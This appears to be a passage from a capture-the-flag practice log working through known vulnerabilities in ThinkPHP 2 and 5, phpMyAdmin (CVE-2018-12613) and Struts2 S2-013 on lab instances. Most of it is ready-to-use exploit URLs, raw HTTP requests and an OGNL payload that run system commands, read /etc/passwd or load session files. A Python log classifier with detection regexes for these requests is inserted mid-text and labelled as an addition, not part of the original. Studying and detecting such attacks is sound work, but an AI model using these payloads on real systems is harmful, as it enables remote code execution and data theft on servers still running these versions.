  • BUU_Real practice log

    [ThinkPHP]5-Rce

    Remote command execution vulnerability in versions below v5.0.23 and v5.1.31

    http://node3.buuoj.cn:29858/index.php
    ?s=index/thinkapp/invokefunction
    &function=call_user_func_array
    &vars[0]=system
    &vars[1][]=whoami

    Get the flag

    http://node3.buuoj.cn:26215/index.php?s=index/thinkapp/invokefunction
    &function=call_user_func_array
    &vars[0]=phpinfo
    &vars[1][]=-1

    Thinkphp5 RCE summary

    [ThinkPHP]5.0.23-Rce

    POST /index.php?s=captcha HTTP/1.1
    Host: node3.buuoj.cn:25184
    Content-Length: 76
    Pragma: no-cache
    Cache-Control: no-cache
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
    Origin: http://node3.buuoj.cn:25184
    Content-Type: application/x-www-form-urlencoded
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://node3.buuoj.cn:25184/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=ls
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Connection: close
    
    _method=__construct&filter[]=system&server[REQUEST_METHOD]=php -i&method=get

    [ThinkPHP]2-Rce

    http://node3.buuoj.cn:28705/index.php/Index/index/name/${@phpinfo()}
    
    http://node3.buuoj.cn:28705/index.php/Index/index/name/${@system(pwd)}

    Thinkphp2.1 vulnerability exploitation

    ThinkPHP vulnerability series: ThinkPHP 2.x arbitrary code execution

    [PHPMYADMIN]CVE-2018-12613

    http://node3.buuoj.cn:28623/index.php?target=sql.php%253F/../../../../../../etc/passwd

    In phpadmin, execute: select "<?php phpinfo();?>"

    GET /index.php?target=tbl_sql.php%253F/../../../../../../../../../../../../../../tmp/sess_672a9aa66b158e4b49d9c1892d0a30c8 HTTP/1.1
    Host: node3.buuoj.cn:28623
    Pragma: no-cache
    Cache-Control: no-cache
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Cookie: pma_lang=zh_CN; phpMyAdmin=672a9aa66b158e4b49d9c1892d0a30c8; auto_saved_sql_sort=
    Connection: close

     phpMyAdmin 4.8.x LFI to RCE

    [struts2]s2-013

    http://node3.buuoj.cn:26757/link.action
    ?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('env').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println('dbapp%3D'%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D

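    Struts2 hit by another remote code execution vulnerability

    env: displays the environment variables that already exist on the system, and runs a command in a defined environment. Variable definitions: variables defined for the new environment; multiple definitions are separated by spaces. The format is "name=value".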
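
A defensive companion to the requests recorded above, added here as an example and not part of the original write-up: a small log classifier that percent-decodes each request repeatedly (so the double-encoded `%253F` is normalized) and flags the ThinkPHP, phpMyAdmin and Struts2 request shapes. The signature names, function names and sample requests are constructed for illustration.

```python
import re
from urllib.parse import unquote

# One signature per section of the write-up; the names are this example's own labels.
SIGNATURES = {
    "thinkphp5-invokefunction": re.compile(r"invokefunction.*function=call_user_func_array", re.I | re.S),
    "thinkphp5.0.23-method-override": re.compile(r"_method=__construct.*filter\[\w*\]=", re.I | re.S),
    "thinkphp2-path-eval": re.compile(r"\$\{@?\w+\("),
    "phpmyadmin-cve-2018-12613": re.compile(r"target=[^&\s]*\?[^&\s]*\.\./", re.I),
    "struts2-ognl": re.compile(r"#_memberAccess|@java\.lang\.Runtime@", re.I),
}


def full_decode(text, max_rounds=5):
    """Percent-decode until the text stops changing (bounded number of rounds)."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def classify(request_line, body=""):
    """Return the sorted names of all signatures matching request line plus body."""
    haystack = full_decode(request_line + "\n" + body)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(haystack))


# Constructed sample requests (request line, body) shaped like the ones on this page.
SAMPLES = [
    ("GET /index.php?s=index/thinkapp/invokefunction&function=call_user_func_array"
     "&vars[0]=phpinfo&vars[1][]=-1 HTTP/1.1", ""),
    ("POST /index.php?s=captcha HTTP/1.1", "_method=__construct&filter[]=phpinfo&method=get"),
    ("GET /index.php/Index/index/name/${@phpinfo()} HTTP/1.1", ""),
    ("GET /index.php?target=sql.php%253F/../../../etc/passwd HTTP/1.1", ""),
    ("GET /link.action?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%7D HTTP/1.1", ""),
    ("GET /index.php?target=sql.php&db=test HTTP/1.1", ""),  # benign phpMyAdmin navigation
]


def scan(samples=SAMPLES):
    """Classify every (request line, body) pair and return the hits in order."""
    return [classify(line, body) for line, body in samples]


if __name__ == "__main__":
    for (line, _), hits in zip(SAMPLES, scan()):
        print(hits or ["clean"], line[:70])
```

Matching runs on the decoded request line plus body, so the POST variant is only caught when request bodies are logged.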

    [struts2]s2-045

  • Original article: https://www.cnblogs.com/chrysanthemum/p/13681983.html